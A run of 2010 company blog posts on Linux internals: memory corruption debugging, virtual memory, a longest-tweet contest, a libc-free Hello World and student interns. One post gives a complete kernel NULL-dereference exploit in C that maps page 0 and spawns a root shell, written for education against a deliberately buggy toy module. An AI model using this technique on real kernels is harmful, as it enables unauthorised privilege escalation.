So how did that happen? We can check the mtime ("modified time") field on the program to determine when the file on disk was modified (assuming, for the moment, that whatever modified it didn't fix up the mtime, which seems unlikely):

[nelhage@psychotique]$ ls -l /usr/bin/expr
-rwxr-xr-x 1 root root 111K 2009-10-06 07:06 /usr/bin/expr*

Curious. The mtime on the binary is from last year, presumably whenever it was built by Ubuntu, and set by the package manager when it installed the system. So unless something really fishy is going on, the binary on disk hasn't been touched.

Memory is a tricky thing.

But hold on. I have 12GB of RAM on my desktop, most of which, at any moment, is being used by the operating system to cache the contents of files on disk. expr is a pretty small program, and frequently used, so there's a good chance it will be entirely in cache, and my OS has basically never touched the disk to load it, since it first did so, probably when I booted my computer. So it's likely that this corruption is entirely in memory. But how can we test that? Simple: by forcing the OS to discard the cached version and re-read it from disk.

On Linux, we can do this by writing to the /proc/sys/vm/drop_caches file, as root. We'll take a checksum of the binary first, drop the caches, and compare the checksum after forcing it to be re-read:

[nelhage@psychotique]$ sha256sum /usr/bin/expr
4b86435899caef4830aaae2bbf713b8dbf7a21466067690a796fa05c363e6089  /usr/bin/expr
[nelhage@psychotique]$ echo 3 | sudo tee /proc/sys/vm/drop_caches
3
[nelhage@psychotique]$ sha256sum /usr/bin/expr
5dbe7ab7660268c578184a11ae43359e67b8bd940f15412c7dc44f4b6408a949  /usr/bin/expr
[nelhage@psychotique]$ sha256sum coreutils/usr/bin/expr
5dbe7ab7660268c578184a11ae43359e67b8bd940f15412c7dc44f4b6408a949  coreutils/usr/bin/expr

And behold, the file changed. The corruption was entirely in memory. And, furthermore, expr no longer segfaults, and matches the version I downloaded earlier.

(The sudo tee idiom is a common one I used to write to a file as root from a normal user shell. sudo echo 3 > /proc/sys/vm/drop_caches of course won't work because the file is still opened for writing by my shell, which doesn't have the required permissions).

Conclusion

As I mentioned earlier, I can't prove this was due to a cosmic ray, or even a hardware error. It could have been some OS bug in my kernel that accidentally did a wild write into my memory in a way that only flipped a single bit. But that'd be a pretty weird bug.

And in fact, since that incident, I've had several other, similar problems. I haven't gotten around to memtesting my machine, but that does suggest I might just have a bad RAM chip on my hands. But even with bad RAM, I'd guess that flipped bits come from noise somewhere -- they're just susceptible to lower levels of noise. So it could just mean I'm more susceptible to the low-energy cosmic rays that are always falling. Regardless of whatever the cause was, though, I hope this post inspires you to think about the dangers of your RAM corrupting your work, and that the tale of my debugging helps you learn some new tools that you might find useful some day.

Now that I've written this post, I'm going to go memtest my machine and check prices on ECC RAM. In the meanwhile, leave your stories in the comments -- have you ever tracked a problem down to memory corruption? What are your practices for coping with the risk of these problems?

Edited to add a note that this could well just be bad RAM, in addition to a one-off cosmic-ray event.

Monday Apr 12, 2010

Much ado about NULL: Exploiting a kernel NULL dereference

Last time, we took a brief look at virtual memory and what a NULL pointer really means, as well as how we can use the mmap(2) function to map the NULL page so that we can safely use a NULL pointer. We think that it's important for developers and system administrators to be more knowledgeable about the attacks that black hats regularly use to take control of systems, and so, today, we're going to start from where we left off and go all the way to a working exploit for a NULL pointer dereference in a toy kernel module.

A quick note: For the sake of simplicity, concreteness, and conciseness, this post, as well as the previous one, assumes Intel x86 hardware throughout. Most of the discussion should be applicable elsewhere, but I don't promise any of the details are the same.

nullderef.ko

In order to allow you play along at home, I've prepared a trivial kernel module that will deliberately cause a NULL pointer derefence, so that you don't have to find a new exploit or run a known buggy kernel to get a NULL dereference to play with. I'd encourage you to download the source and follow along at home. If you're not familiar with building kernel modules, there are simple directions in the README. The module should work on just about any Linux kernel since 2.6.11.

Don't run this on a machine you care about – it's deliberately buggy code, and will easily crash or destabilize the entire machine. If you want to follow along, I recommend spinning up a virtual machine for testing.

While we'll be using this test module for demonstration, a real exploit would instead be based on a NULL pointer dereference somewhere in the core kernel (such as last year's sock_sendpage vulnerability), which would allow an attacker to trigger a NULL pointer dereference -- much like the one this toy module triggers -- without having to load a module of their own or be root.

If we build and load the nullderef module, and execute

echo 1 > /sys/kernel/debug/nullderef/null_read

our shell will crash, and we'll see something like the following on the console (on a physical console, out a serial port, or in dmesg):

BUG: unable to handle kernel NULL pointer dereference at 00000000

IP: [<c5821001>] null_read_write+0x1/0x10 [nullderef]

The kernel address space

e We saw last time that we can map the NULL page in our own application. How does this help us with kernel NULL dereferences? Surely, if every application has its own address space and set of addresses, the core operating system itself must also have its own address space, where it and all of its code and data live, and mere user programs can't mess with it?

For various reasons, that that's not quite how it works. It turns out that switching between address spaces is relatively expensive, and so to save on switching address spaces, the kernel is actually mapped into every process's address space, and the kernel just runs in the address space of whichever process was last executing.

In order to prevent any random program from scribbling all over the kernel, the operating system makes use of a feature of the x86's virtual memory architecture called memory protection. At any moment, the processor knows whether it is executing code in user (unprivileged) mode or in kernel mode. In addition, every page in the virtual memory layout has a flag on it that specifies whether or not user code is allowed to access it. The OS can thus arrange things so that program code only ever runs in "user" mode, and configures virtual memory so that only code executing in "kernel" mode is allowed to read or write certain addresses. For instance, on most 32-bit Linux machines, in any process, the address 0xc0100000 refers to the start of the kernel's memory – but normal user code is not allowed to read or write it.

A diagram of virtual memory and memory protection
A diagram of virtual memory and memory protection

Since we have to prevent user code from arbitrarily changing privilege levels, how do we get into kernel mode? The answer is that there are a set of entry points in the kernel that expect to be callable from unprivileged code. The kernel registers these with the hardware, and the hardware has instructions that both switch to one of these entry points, and change to kernel mode. For our purposes, the most relevant entry point is the system call handler. System calls are how programs ask the kernel to do things for them. For example, if a programs want to write from a file, it prepares a file descriptor referring to the file and a buffer containing the data to write. It places them in a specified location (usually in certain registers), along with the number referring to the write(2) system call, and then it triggers one of those entry points. The system call handler in the kernel then decodes the argument, does the write, and return to the calling program.

This all has at least two important consequence for exploiting NULL pointer dereferences:

First, since the kernel runs in the address space of a userspace process, we can map a page at NULL and control what data a NULL pointer dereference in the kernel sees, just like we could for our own process!

Secondly, if we do somehow manage to get code executing in kernel mode, we don't need to do any trickery at all to get at the kernel's data structures. They're all there in our address space, protected only by the fact that we're not normally able to run code in kernel mode.

We can demonstrate the first fact with the following program, which writes to the null_read file to force a kernel NULL dereference, but with the NULL page mapped, so that nothing goes wrong:

(As in part I, you'll need to echo 0 > /proc/sys/vm/mmap_min_addr as root before trying this on any recent distribution's kernel. While mmap_min_addr does provide some protection against these exploits, attackers have in the past found numerous ways around this restriction. In a real exploit, an attacker would use one of those or find a new one, but for demonstration purposes it's easier to just turn it off as root.)

#include <sys/mman.h>
#include <stdio.h>
#include <fcntl.h>

int main() {
  mmap(0, 4096, PROT_READ|PROT_WRITE,
       MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  int fd = open("/sys/kernel/debug/nullderef/null_read", O_WRONLY);
  write(fd, "1", 1);
  close(fd);

  printf("Triggered a kernel NULL pointer dereference!\n");
  return 0;
}

Writing to that file will trigger a NULL pointer dereference by the nullderef kernel module, but because it runs in the same address space as the user process, the read proceeds fine and nothing goes wrong – no kernel oops. We've passed the first step to a working exploit.

Putting it together

To put it all together, we'll use the other file that nullderef exports, null_call. Writing to that file causes the module to read a function pointer from address 0, and then call through it. Since the Linux kernel uses function pointers essentially everywhere throughout its source, it's quite common that a NULL pointer dereference is, or can be easily turned into, a NULL function pointer dereference, so this is not totally unrealistic.

So, if we just drop a function pointer of our own at address 0, the kernel will call that function pointer in kernel mode, and suddenly we're executing our code in kernel mode, and we can do whatever we want to kernel memory.

We could do anything we want with this access, but for now, we'll stick to just getting root privileges. In order to do so, we'll make use of two built-in kernel functions, prepare_kernel_cred and commit_creds. (We'll get their addresses out of the /proc/kallsyms file, which, as its name suggests, lists all kernel symbols with their addresses)

struct cred is the basic unit of "credentials" that the kernel uses to keep track of what permissions a process has – what user it's running as, what groups it's in, any extra credentials it's been granted, and so on. prepare_kernel_cred will allocate and return a new struct cred with full privileges, intended for use by in-kernel daemons. commit_cred will then take the provided struct cred, and apply it to the current process, thereby giving us full permissions.

Putting it together, we get:

#include <sys/mman.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

struct cred;
struct task_struct;

typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *daemon)
  __attribute__((regparm(3)));
typedef int (*commit_creds_t)(struct cred *new)
  __attribute__((regparm(3)));

prepare_kernel_cred_t prepare_kernel_cred;
commit_creds_t commit_creds;

/* Find a kernel symbol in /proc/kallsyms */
void *get_ksym(char *name) {
    FILE *f = fopen("/proc/kallsyms", "rb");
    char c, sym[512];
    void *addr;
    int ret;

    while(fscanf(f, "%p %c %s\n", &addr, &c, sym) > 0)
        if (!strcmp(sym, name))
            return addr;
    return NULL;
}

/* This function will be executed in kernel mode. */
void get_root(void) {
        commit_creds(prepare_kernel_cred(0));
}

int main() {
  prepare_kernel_cred = get_ksym("prepare_kernel_cred");
  commit_creds        = get_ksym("commit_creds");

  if (!(prepare_kernel_cred && commit_creds)) {
      fprintf(stderr, "Kernel symbols not found. "
                      "Is your kernel older than 2.6.29?\n");
  }

  /* Put a pointer to our function at NULL */
  mmap(0, 4096, PROT_READ|PROT_WRITE,
       MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  void (**fn)(void) = NULL;
  *fn = get_root;

  /* Trigger the kernel */
  int fd = open("/sys/kernel/debug/nullderef/null_call", O_WRONLY);
  write(fd, "1", 1);
  close(fd);

  if (getuid() == 0) {
      char *argv[] = {"/bin/sh", NULL};
      execve("/bin/sh", argv, NULL);
  }

  fprintf(stderr, "Something went wrong?\n");
  return 1;
}

(struct cred is new as of kernel 2.6.29, so for older kernels, you'll need to use this this version, which uses an old trick based on pattern-matching to find the location of the current process's user id. Drop me an email or ask in a comment if you're curious about the details.)

So, that's really all there is. A "production-strength" exploit might add lots of bells and whistles, but, there'd be nothing fundamentally different. mmap_min_addr offers some protection, but crackers and security researchers have found ways around it many times before. It's possible the kernel developers have fixed it for good this time, but I wouldn't bet on it.

One last note: Nothing in this post is a new technique or news to exploit authors. Every technique described here has been in active use for years. This post is intended to educate developers and system administrators about the attacks that are in regular use in the wild.

Monday Mar 29, 2010

Much ado about NULL: An introduction to virtual memory

Here at Ksplice, we're always keeping a very close eye on vulnerabilities that are being announced in Linux. And in the last half of last year, it was very clear that NULL pointer dereference vulnerabilities were the current big thing. Brad Spengler made it abundantly clear to anyone who was paying the least bit attention that these vulnerabilities, far more than being mere denial of service attacks, were trivially exploitable privilege escalation vulnerabilities. Some observers even dubbed 2009 the year of the kernel NULL pointer dereference.

If you've ever programmed in C, you've probably run into a NULL pointer dereference at some point. But almost certainly, all it did was crash your program with the dreaded "Segmentation Fault". Annoying, and often painful to debug, but nothing more than a crash. So how is it that this simple programming error becomes so dangerous when it happens in the kernel? Inspired by all the fuss, this post will explore a little bit of how memory works behind the scenes on your computer. By the end of today's installment, we'll understand how to write a C program that reads and writes to a NULL pointer without crashing. In a future post, I'll take it a step further and go all the way to showing how an attacker would exploit a NULL pointer dereference in the kernel to take control of a machine!

What's in a pointer?

There's nothing fundamentally magical about pointers in C (or assembly, if that's your thing). A pointer is just an integer, that (with the help of the hardware) refers to a location somewhere in that big array of bits we call a computer's memory. We can write a C program to print out a random pointer:

#include <stdio.h>
int main(int argc, char **argv) {
  printf("The argv pointer = %d\n", argv);
  return 0;
}

Which, if you run it on my machine, prints:

The argv pointer = 1680681096

(Pointers are conventionally written in hexadecimal, which would make that 0x642d2888, but that's just a notational thing. They're still just integers.)

NULL is only slightly special as a pointer value: if we look in stddef.h, we can see that it's just defined to be the pointer with value 0. The only thing really special about NULL is that, by convention, the operating system sets things up so that NULL is an invalid pointer, and any attempts to read or write through it lead to an error, which we call a segmentation fault. However, this is just convention; to the hardware, NULL is just another possible pointer value.

But what do those integers actually mean? We need to understand a little bit more about how memory works in a modern computer. In the old days (and still on many embedded devices), a pointer value was literally an index into all of the memory on those little RAM chips in your computer:

Diagram of Physical Memory Addresses
Mapping pointers directly to hardware memory

This was true for every program, including the operating system itself. You can probably guess what goes wrong here: suppose that Microsoft Word is storing your document at address 700 in memory. Now, you're browsing the web, and a bug in Internet Explorer causes it to start scribbling over random memory and it happens to scribble over memory around address 700. Suddenly, bam, Internet Explorer takes Word down with it. It's actually even worse than that: a bug in IE can even take down the entire operating system.

This was widely regarded as a bad move, and so all modern hardware supports, and operating systems use, a scheme called virtual memory. What this means it that every program running on your computer has its own namespace for pointers (from 0 to 232-1, on a 32-bit machine). The value 700 means something completely different to Microsoft Word and Internet Explorer, and neither can access the other's memory. The operating system is in charge of managing these so-called address spaces, and mapping different pieces of each program's address space to different pieces of physical memory.

A diagram of virtual memory

The world with Virtual Memory. Dark gray shows portions of the address space that refer to valid memory.

mmap(2)

One feature of this setup is that while each process has its own 232 possible addresses, not all of them need to be valid (correspond to real memory). In particular, by default, the NULL or 0 pointer does not correspond to valid memory, which is why accessing it leads to a crash.

Because each application has its own address space, however, it is free to do with it as it wants. For instance, you're welcome to declare that NULL should be a valid address in your application. We refer to this as "mapping" the NULL page, because you're declaring that that area of memory should map to some piece of physical memory.

On Linux (and other UNIX) systems, the function call used for mapping regions of memory is mmap(2). mmap is defined as:

void *mmap(void *addr, size_t length, int prot, int flags,
           int fd, off_t offset);

Let's go through those arguments in order (All of this information comes from the man page):

addr
This is the address where the application wants to map memory. If MAP_FIXED is not specified in flags, mmap may select a different address if the selected one is not available or inappropriate for some reason.
length
The length of the region the application wants to map. Memory can only be mapped in increments of a "page", which is 4k (4096 bytes) on x86 processors.
prot
Short for "protection", this argument must be a combination of one or more of the values PROT_READ, PROT_WRITE, PROT_EXEC, or PROT_NONE, indicating whether the application should be able to read, write, execute, or none of the above, the mapped memory.
flags
Controls various options about the mapping. There are a number of flags that can go here. Some interesting ones are MAP_PRIVATE, which indicates the mapping should not be shared with any other process, MAP_ANONYMOUS, which indicates that the fd argument is irrelevant, and MAP_FIXED, which indicates that we want memory located exactly at addr.
fd
The primary use of mmap is not just as a memory allocator, but in order to map files on disk to appear in a process's address space, in which case fd refers to an open file descriptor to map. Since we just want a random chunk of memory, we're going pass MAP_ANONYMOUS in flags, which indicates that we don't want to map a file, and fd is irrelevant.
offset
This argument would be used with fd to indicate which portion of a file we wanted to map.
mmap returns the address of the new mapping, or MAP_FAILED if something went wrong.

If we just want to be able to read and write the NULL pointer, we'll want to set addr to 0 and length to 4096, in order to map the first page of memory. We'll need PROT_READ and PROT_WRITE to be able to read and write, and all three of the flags I mentioned. fd and offset are irrelevant; we'll set them to -1 and 0 respectively.

Putting it all together, we get the following short C program, which successfully reads and writes through a NULL pointer without crashing!

(Note that most modern systems actually specifically disallow mapping the NULL page, out of security concerns. To run the following example on a recent Linux machine at home, you'll need to run # echo 0 > /proc/sys/vm/mmap_min_addr as root, first.)

#include <sys/mman.h>
#include <stdio.h>

int main() {
  int *ptr = NULL;
  if (mmap(0, 4096, PROT_READ|PROT_WRITE,
           MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0)
      == MAP_FAILED) {
    perror("Unable to mmap(NULL)");
    fprintf(stderr, "Is /proc/sys/vm/mmap_min_addr non-zero?\n");
    return 1;
  }
  printf("Dereferencing my NULL pointer yields: %d\n", *ptr);
  *ptr = 17;
  printf("Now it's: %d\n", *ptr);
  return 0;
}

Next time, we'll look at how a process can not only map NULL in its own address space, but can also create mappings in the kernel's address space. And, I'll show you how this lets an attacker use a NULL dereference in the kernel to take over the entire machine. Stay tuned!

Wednesday Mar 24, 2010

The 1st International Longest Tweet Contest

How much information is in a tweet?

There are a lot of snarky answers to that. Let's talk mathematically, where information is measured in bits: How many bits can be expressed in a tweet?

It's kind of fun to try to figure out how to cram in the most information. Our current in-house record is 4.2 kilobits (525 bytes) per tweet, but this can definitely be bested. Twitter's 140-character limit has been under assault for some time, but nobody has decisively anointed a winner.

To that end, announcing the 1st International Longest Tweet Contest, along the lines of the International Obfuscated C Code Contest. The goal: fit the most bits of information into a tweet. There will be glorious fame and a T-shirt for the winner. More on that later. But first, a dialog:


Ben Bitdiddle: How big can a tweet get? SMS is limited to 160 characters of 7-bit ASCII, or 1,120 bits. Since Twitter based their limit on SMS but with 20 characters reserved for your name, a tweet is probably limited to 140 × 7 = 980 bits.

Alyssa P. Hacker: Not quite -- despite its SMS roots, Twitter supports Unicode, and the company says its 140-character limit is based on Unicode characters, not ASCII. So it's a lot more than 980 bits.

Ben: Ok, Unicode is a 16-bit character set, so the answer is 140 × 16 = 2,240 bits.

Alyssa: Well, since that Java documentation was written, Unicode has expanded to cover more of the world's languages. These days there are 1,112,064 possible Unicode characters (officially "Unicode scalar values") that can be represented, including in the UTF-8 encoding that Twitter and most of the Internet uses. That makes Unicode about 20.1 bits per character, not 16. (Since log2 1,112,064 ≈ 20.1.)

Ben: Ok, if each character can take on one of 1,112,064 possible values, we can use that to figure out how many total different tweets there can ever be. And from that, we'll know how many bits can be encoded into a tweet. But how?

Alyssa: It's easy! We just calculate the total number of different tweets that can ever be received. The capacity of a tweet, in bits, is just the base-2 logarithm of that number. According to my calculator here, 1,112,064 to the 140th power is about 28.7 quattuordecillion googol googol googol googol googol googol googol googol. That's the number of distinct 140-character messages that can be sent. Plus we have to add in the 139-character messages and 138-character messages, etc. Taking the log, I get 2,811 bits per tweet.

Ben: We'd get almost the same answer if we just multiplied 20.1 bits per character times 140 characters. Ok, 2.8 kilobits per tweet.

Alyssa: I just discovered a problem. There aren't that many distinct tweets! For example, I can't tell the difference between the single character '<' and the four characters '&lt;'. I also can't send a tweet that contains nothing but some null characters. So we have to deflate our number a little bit. It's tricky because we don't know Twitter's exact limitations; it's a black box.

Ben: But the answer will still be roughly 2.8 kilobits. Can we do better?

Alyssa: By golly, I think we can! Turns out Unicode is basically identical to an international standard, called the Universal Multi-Octet Coded Character Set, known as UCS or ISO/IEC 10646. But the two standards weren't always the same -- in the 90s, there was a lot of disagreement between the computer companies who backed Unicode and proposed a simple 16-bit character set, and the standards mavens behind UCS, who wanted to accommodate more languages than 65,536 characters would allow. The two sides eventually compromised on the current 20.1-bit character set, but some historical differences still linger between the two "official" specifications -- including in the definition of the UTF-8 encoding that Twitter uses. Check this out:


UTF-8 according to Unicode

UTF-8 according to ISO/IEC 10646

Alyssa: Although Unicode's UTF-8 can only encode the 1,112,064 Unicode scalar values, UCS's version of UTF-8 is a lot bigger -- it goes up to 31 bits!

Ben: So, when Twitter says they use UTF-8, which version are they using? Unicode, or UCS?

Alyssa: Hmm, that's a good question. Let's write a program to test. I'll send Twitter a really big UCS character in UTF-8, represented in octal like this. This is way outside the bounds of well-formed Unicode.

$ perl -Mbytes -we 'print pack "U", (2**31 - 5)' | od -t o1
0000000 375 277 277 277 277 273

Ben: Hey, that kind of worked! When we fetch it back using Twitter's JSON API, we get this JSON fragment:

"text":"\\375\\277\\277\\277\\277\\273"

Alyssa: It's the same thing we sent! The character (really an unassigned code position) is represented in UTF-8, in octal with backslashes in ASCII. That means Twitter "characters" are actually 31 bits, not 20.1 bits. The capacity of a tweet is actually a lot bigger than the 2.8 kilobits we calculated earlier.

Ben: Should we worry that the text only shows up in the JSON API, not XML or HTML, and these high characters only last a few days on Twitter's site before vanishing?

Alyssa: Nope. As long as we had this exchange in our conversation, people on the Internet won't complain about those issues.


Using Alyssa's insight that Twitter actually supports 31-bit UCS characters (not just Unicode), we can come up with a simple program to send 4.2-kilobit tweets using only code positions that aren't in Unicode. That way there's no ambiguity between these crazy code positions, which Twitter represents as backslashed octal, and legitimate Unicode, which Twitter sends literally. These tweets have a text field that's a whopping 3,360 bytes long -- but in ASCII octal UTF-8, so they only represent 525 bytes of information in the end.

  • The sender program reads the first 525 bytes of standard input or a file, slices it into 30-bit chunks, and sends it to Twitter using 31-bit UCS code positions. The high bit of each character is set to 1 to avoid ever sending a valid Unicode UTF-8 string, which Twitter might treat ambiguously. It outputs the ID of the tweet it posted. You'll have to fill in your own username and password to test it.
  • The receiver program does the opposite -- give it an ID on the command line, and it will retrieve and decode a "megatwit" encoded by the sender.

Here's an example of how to use the programs and verify that they can encode at least one arbitrary 4,200-bit message:

$ dd if=/dev/urandom of=random.bits bs=525 count=1
1+0 records in
1+0 records out
525 bytes (525 B) copied, 0.0161392 s, 32.5 kB/s
$ md5sum random.bits 
a7da09e59d1b6807e78aac7004e6ba41  random.bits
$ ./megatwit-send &lt; random.bits 
11037181699
$ ./megatwit-get 11037181699 | md5sum
a7da09e59d1b6807e78aac7004e6ba41  -

But this is just the start -- we're not the only ones interested in really long tweets. (Structures, strictures...) Others have found an apparent loophole in how Twitter handles some URLs, allowing them to send tweets with a text field up to 532 bytes long (how much information can be coded this way isn't clear). Maxitweet has come up with a clever way to milk the most out of 140 Unicode characters without requiring a decoder program, at least at its lower compression levels. There are definitely even better ways to cram as many bits as possible into a tweet.

So here is the challenge for the 1st International Longest Tweet Contest:

  1. Come up with a strategy for encoding arbitrary binary data into a single tweet, along the lines of the sample programs described here.
  2. Implement a sender and receiver for the strategy in a computer programming language of your choice. We recommend you choose a language likely to be runnable by a wide variety of readers. At your option, you may provide a Web site or other public implementation for others to test your coding scheme with arbitrary binary input.
  3. Write a description, in English, for how your coding scheme works. Explain how many bits per tweet it achieves, and justify your calculation. The explanation must be convincing because it is intractable to prove conclusively that a certain capacity is achievable, even if a program successfully sends and receives many test cases.
  4. Send your entry, consisting of #2 and #3, to megatwit@ksplice.com ksplice_blog_us_grp@oracle.com before Sunday, April 11, 2010, 23h59 UTC.
  5. Based on the English explanations of the coding schemes (#3), we'll select finalists from among the entrants. In mid-April, we'll post the finalists' submissions on the blog. In the spirit of Twitter, we'll let the community assess, criticize, test, and pick apart the finalists' entries.
  6. Based on the community's feedback, we'll choose at least one winner. This will generally be the person whose scheme for achieving the highest information encoded per tweet is judged most convincing.
  7. The winner will receive notoriety and fame on this blog, and a smart-looking Ksplice T-shirt in the size of your choice. You will be known the world over as the Reigning Champion of the International Longest Tweet Contest until there is another contest. Legally we can't promise this, but there's a chance Stephen Colbert will have you on as a result of winning this prestigious contest.
  8. By entering the contest, you are giving Ksplice permission to post your entry if you are selected as a finalist. The contest is void where prohibited. The rules are subject to change at our discretion. Employees of Ksplice aren't eligible because they already have T-shirts. Judging will be done by Ksplice in its sole discretion.

That's it. Happy tweeting!

~keithw

Tuesday Mar 16, 2010

Hello from a libc-free world! (Part 1)

As an exercise, I want to write a Hello World program in C simple enough that I can disassemble it and be able to explain all of the assembly to myself.

This should be easy, right?

This adventure assumes compilation and execution on a Linux machine. Some familiarity with reading assembly is helpful.

Here's our basic Hello World program:

jesstess@kid-charlemagne:~/c$ cat hello.c
#include <stdio.h>

int main()
{
  printf("Hello World\n");
  return 0;
}

Let's compile it and get a bytecount:

jesstess@kid-charlemagne:~/c$ gcc -o hello hello.c
jesstess@kid-charlemagne:~/c$ wc -c hello
10931 hello

Yikes! Where are 11 Kilobytes worth of executable coming from? objdump -t hello gives us 79 symbol-table entries, most of which we can blame on our using the standard library.

So let's stop using it. We won't use printf so we can get rid of our include file:

jesstess@kid-charlemagne:~/c$ cat hello.c
int main()
{
  char *str = "Hello World";
  return 0;
}

Recompiling and checking the bytecount:

jesstess@kid-charlemagne:~/c$ gcc -o hello hello.c
jesstess@kid-charlemagne:~/c$ wc -c hello
10892 hello

What? That barely changed anything!

The problem is that gcc is still using standard library startup files when linking. Want proof? We'll compile with -nostdlib, which according to the gcc man page won't "use the standard system libraries and startup files when linking. Only the files you specify will be passed to the linker".

jesstess@kid-charlemagne:~/c$ gcc -nostdlib -o hello hello.c
/usr/bin/ld: warning: cannot find entry symbol _start; defaulting to 00000000004000e8

Well, it's just a warning; let's check it anyway:

jesstess@kid-charlemagne:~/c$ wc -c hello
1329 hello

That looks pretty good! We got our bytecount down to a much more reasonable size (an order of magnitude smaller!)...

jesstess@kid-charlemagne:~/c$ ./hello
Segmentation fault

...at the expense of segfaulting when it runs. Hrmph.

For fun, let's get our program to be actually runnable before digging into the assembly.

So what is this _start entry symbol that appears to be required for our program to run? Where is it usually defined if you're using libc?

From the perspective of the linker, by default _start is the actual entry point to your program, not main. It is normally defined in the crt1.o ELF relocatable. We can verify this by linking against crt1.o and noting that _start is now found (although we develop other problems by not having defined other necessary libc startup symbols):

# Compile the source files but don't link
jesstess@kid-charlemagne:~/c$ gcc -Os -c hello.c
# Now try to link
jesstess@kid-charlemagne:~/c$ ld /usr/lib/crt1.o -o hello hello.o
/usr/lib/crt1.o: In function `_start':
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:106: undefined reference to `__libc_csu_fini'
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:107: undefined reference to `__libc_csu_init'
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:113: undefined reference to `__libc_start_main'

This check conveniently also tells us where _start lives in the libc source: sysdeps/x86_64/elf/start.S for this particular machine. This delightfully well-commented file exports the _start symbol, sets up the stack and some registers, and calls __libc_start_main. If we look at the very bottom of csu/libc-start.c we see the call to our program's main:

result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);

and down the rabbit hole we go.

So that's what _start is all about. Conveniently, we can summarize what happens between _start and the call to main as "set up a bunch of stuff for libc and then call main'', and since we don't care about libc, let's just export our own _start symbol that just calls main and link against that:

jesstess@kid-charlemagne:~/c$ cat stubstart.S
.globl _start

_start:
    call main

Compiling and running with our stub _start assembly file:

jesstess@kid-charlemagne:~/c$ gcc -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ ./hello
Segmentation fault

Hurrah, our compilation problems go away! However, we still segfault. Why? Let's compile with debugging information and take a look in gdb. We'll set a breakpoint at main and step through until the segfault:

jesstess@kid-charlemagne:~/c$ gcc -g -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ gdb hello
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu"...
(gdb) break main
Breakpoint 1 at 0x4000f4: file hello.c, line 3.
(gdb) run
Starting program: /home/jesstess/c/hello

Breakpoint 1, main () at hello.c:5
5      char *str = "Hello World";
(gdb) step
6      return 0;
(gdb) step
7    }
(gdb) step
0x00000000004000ed in _start ()
(gdb) step
Single stepping until exit from function _start,
which has no line number information.
main () at helloint.c:4
4    {
(gdb) step
Breakpoint 1, main () at helloint.c:5
5      char *str = "Hello World";
(gdb) step
6      return 0;
(gdb) step
7    }
(gdb) step
Program received signal SIGSEGV, Segmentation fault.
0x0000000000000001 in ?? ()
(gdb)

Wait, what? Why are we running through main twice? ...It's time to look at the assembly:

jesstess@kid-charlemagne:~/c$ objdump -d hello
hello:     file format elf64-x86-64

Disassembly of section .text:

00000000004000e8 <_start>:
4000e8: e8 03 00 00 00            callq 4000f0
4000ed: 90                        nop
4000ee: 90                        nop
4000ef: 90                        nop
00000000004000f0 :
4000f0: 55                        push %rbp
4000f1: 48 89 e5                  mov %rsp,%rbp
4000f4: 48 c7 45 f8 03 01 40      movq $0x400103,-0x8(%rbp)
4000fb: 00
4000fc: b8 00 00 00 00            mov $0x0,%eax
400101: c9                        leaveq
400102: c3                        retq

D'oh! Let's save a detailed examination of the assembly for later, but in brief: when we return from the callq to main we hit some nops and run right back into main. Since we re-entered main without putting a return instruction pointer on the stack as part of the standard prologue for calling a function, the second call to retq tries to pop a bogus return instruction pointer off the stack and jump to it and we bomb out. We need an exit strategy.

Literally. After the return from callq, push 1, the syscall number for SYS_exit, into %eax, and because we want to say that we're exiting cleanly, put a status of 0, SYS_exit's only argument, into %ebx. Then make the interrupt to drop into the kernel with int $0x80.

jesstess@kid-charlemagne:~/c$ cat stubstart.S
.globl _start

_start:
    call main
    movl $1, %eax
    xorl %ebx, %ebx
    int $0x80
jesstess@kid-charlemagne:~/c$ gcc -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ ./hello
jesstess@kid-charlemagne:~/c$

Success! It compiles, it runs, and if we step through this new version under gdb it even exits normally.

Hello from a libc-free world!

Stay tuned for Part 2, where we'll walk through the parts of the executable in earnest and watch what happens to it as we add complexity, in the process understanding more about x86 linking and calling conventions and the structure of an ELF binary.

~jesstess

Tuesday Mar 09, 2010

How to quadruple your productivity with an army of student interns

Startup companies are always hunting for ways to accomplish as much as possible with what they have available. Last December we realized that we had a growing queue of important engineering projects outside of our core technology that our team didn't have the time to finish anytime soon. To make matters worse, we wanted the projects completed right away, in time for our planned product launch in early February.

So what did we do? The logical solution, of course. We quadrupled the size of our company's engineering team for one month using paid student interns.

20 men and women posing for a group photo

The Ksplice interns, ca. January 2010.

Now, if you happen to know Fred Brooks, please don't tell him what we did. He managed the Windows Vista of the 1960s---IBM's OS/360, a software project of unprecedented size, complexity, and lateness---and wrote up the resulting hard-earned lessons in The Mythical Man-Month, which everyone managing software projects should read. The big one is Brooks's Law: "adding manpower to a late software project makes it later". Oops.

Brooks's observation usually holds. New people take time to get up to speed on any system---both their own time, and the time of your experienced people mentoring them. They also add communication costs that grow quadratically with the size of the team.

Fortunately, Ksplice benefits from a bit of an engineering reality distortion field (our very product is supposed to be technologically impossible) and, with the right techniques, quadrupling our engineering team's size for one month worked out great. Every intern was responsible for one of the company's top unaddressed priorities for the month, and every intern successfully completed their project.

So, how do you quadruple the size of your engineering team in one month and still keep everyone productive?

Ten people working at computers in a room
At work in the Ksplice engineering office.

